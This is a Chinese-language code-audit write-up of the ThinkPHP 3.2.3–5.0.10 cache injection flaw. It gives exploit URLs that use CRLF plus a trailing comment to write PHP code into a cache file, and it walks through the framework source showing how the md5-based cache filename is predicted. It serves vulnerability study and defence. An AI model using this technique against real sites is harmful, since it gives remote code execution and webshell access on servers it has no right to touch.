PHP代码审计—ThinkPHP5.0.10-3.2.3缓存Getshell
前言
thinkphp缓存漏洞的触发点以及生成的缓存文件的文件名 一般需要结合代码 审计来找到,
因为使用S() 或者 Cache() 函数的位置不确定,调用函数的传参变量也不确定
thinkphp3.2.3
漏洞复现
控制器添加test方法,如下
<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
public function index(){
$this->show('<style type="text/css">*{ padding: 0; margin: 0; } div{ padding: 4px 48px;} body{ background: #fff; font-family: "微软雅黑"; color: #333;font-size:24px} h1{ font-size: 100px; font-weight: normal; margin-bottom: 12px; } p{ line-height: 1.8em; font-size: 36px } a,a:hover{color:blue;}</style><div style="padding: 24px 48px;"> <h1>:)</h1><p>欢迎使用 <b>ThinkPHP</b>!</p><br/>版本 V{$Think.version}</div><script type="text/javascript" src="http://ad.topthink.com/Public/static/client.js"></script><thinkad id="ad_55e75dfae343f5a1"></thinkad><script type="text/javascript" src="http://tajs.qq.com/stats?sId=9347272" charset="UTF-8"></script>','utf-8');
}
public function test(){
S('cache',I('x'));
}
}
浏览器访问
http://192.168.1.8/index.php?s=/Home/index/test&x=test
在Application/Runtime/Temp/文件夹下成功生成了php文件
<?php
//000000000000s:4:"test";
?>
传参内容被注释掉了,参数未过滤%0d%0a
可以以此来绕过行注释,访问
http://192.168.1.8/index.php?s=/Home/index/test&x=%0d%0aphpinfo();//
成功绕过注释,生成文件 0fea6a13c52b4d4725368f24b045ca84.php,
因为调用缓存函数时传参是 S('cache',I('x'));
所以生成的缓存文件名是 md5(cache).php
<?php
//000000000000s:16:"
phpinfo();
//";
?>
url:
http://192.168.1.8/Application/Runtime/Temp/0fea6a13c52b4d4725368f24b045ca84.php
漏洞分析
首先跟进S 方法,经过一系列判断调用了 set 方法
function S($name,$value='',$options=null) {
static $cache = '';
if(is_array($options)){
// 缓存操作的同时初始化
$type = isset($options['type'])?$options['type']:'';
$cache = Think\Cache::getInstance($type,$options);
}elseif(is_array($name)) { // 缓存初始化
$type = isset($name['type'])?$name['type']:'';
$cache = Think\Cache::getInstance($type,$name);
return $cache;
}elseif(empty($cache)) { // 自动初始化
$cache = Think\Cache::getInstance();
}
if(''=== $value){ // 获取缓存
return $cache->get($name);
}elseif(is_null($value)) { // 删除缓存
return $cache->rm($name);
}else { // 缓存数据
if(is_array($options)) {
$expire = isset($options['expire'])?$options['expire']:NULL;
}else{
$expire = is_numeric($options)?$options:NULL;
}
return $cache->set($name, $value, $expire);
}
}
然后跟进到/Library/Think/Cache/File.class.php文件,可以看到
$data 未经任何过滤,序列化过后,直接被写到文件内
序列化过后,payload被有双引号包裹,最后还有分号
s:10:"phpinfo();";
然后在前面拼接上注释符号,所以这里在payload前面使用 %0d%0a 回车换行绕过,
后面我们在payload后面添加注释符,注释掉序列化数据生成的"和;
payload:
http://192.168.1.8/index.php?s=/Home/index/test&x=%0d%0aphpinfo();//
public function set($name,$value,$expire=null) {
N('cache_write',1);
if(is_null($expire)) {
$expire = $this->options['expire'];
}
$filename = $this->filename($name);
$data = serialize($value);
if( C('DATA_CACHE_COMPRESS') && function_exists('gzcompress')) {
//数据压缩
$data = gzcompress($data,3);
}
if(C('DATA_CACHE_CHECK')) {//开启数据校验
$check = md5($data);
}else {
$check = '';
}
$data = "<?php\n//".sprintf('%012d',$expire).$check.$data."\n?>";
$result = file_put_contents($filename,$data);
if($result) {
if($this->options['length']>0) {
// 记录缓存队列
$this->queue($name);
}
clearstatcache();
return true;
}else {
return false;
}
}
跟进 $this->filename($name)方法
private function filename($name) {
$name = md5(C('DATA_CACHE_KEY').$name);
if(C('DATA_CACHE_SUBDIR')) {
// 使用子目录
$dir ='';
for($i=0;$i<C('DATA_PATH_LEVEL');$i++) {
$dir .= $name{$i}.'/';
}
if(!is_dir($this->options['temp'].$dir)) {
mkdir($this->options['temp'].$dir,0755,true);
}
$filename = $dir.$this->options['prefix'].$name.'.php';
}else{
$filename = $this->options['prefix'].$name.'.php';
}
return $this->options['temp'].$filename;
}
文件名 由 调用缓存函数时传参$name 和 配置文件里面的参数DATA_CACHE_KEY、DATA_CACHE_SUBDIR、DATA_CACHE_PREFIX
共同决定,但是配置文件里面这些参数一般默认为空
S('cache',I('x'));
// 所以一般情况下文件名为 md5(cache).php
// 0fea6a13c52b4d4725368f24b045ca84.php
thinkphp5.0.5
原理类似,缓存文件的路径不一样
protected function getCacheKey($name)
{
$name = md5($name);
if ($this->options['cache_subdir']) {
// 使用子目录
$name = substr($name, 0, 2) . DS . substr($name, 2);
}
if ($this->options['prefix']) {
$name = $this->options['prefix'] . DS . $name;
}
$filename = $this->options['path'] . $name . '.php';
$dir = dirname($filename);
if (!is_dir($dir)) {
mkdir($dir, 0755, true);
}
return $filename;
}
缓存文件位置 b0 文件夹是 md5($name) 前 2 位。
http://domain/runtime/cache/b0/b068931cc450442b63f5b3d276ea4297.php
参考文章
ThinkPHP3.2.3~5.0.10缓存函数设计缺陷可导致Getshell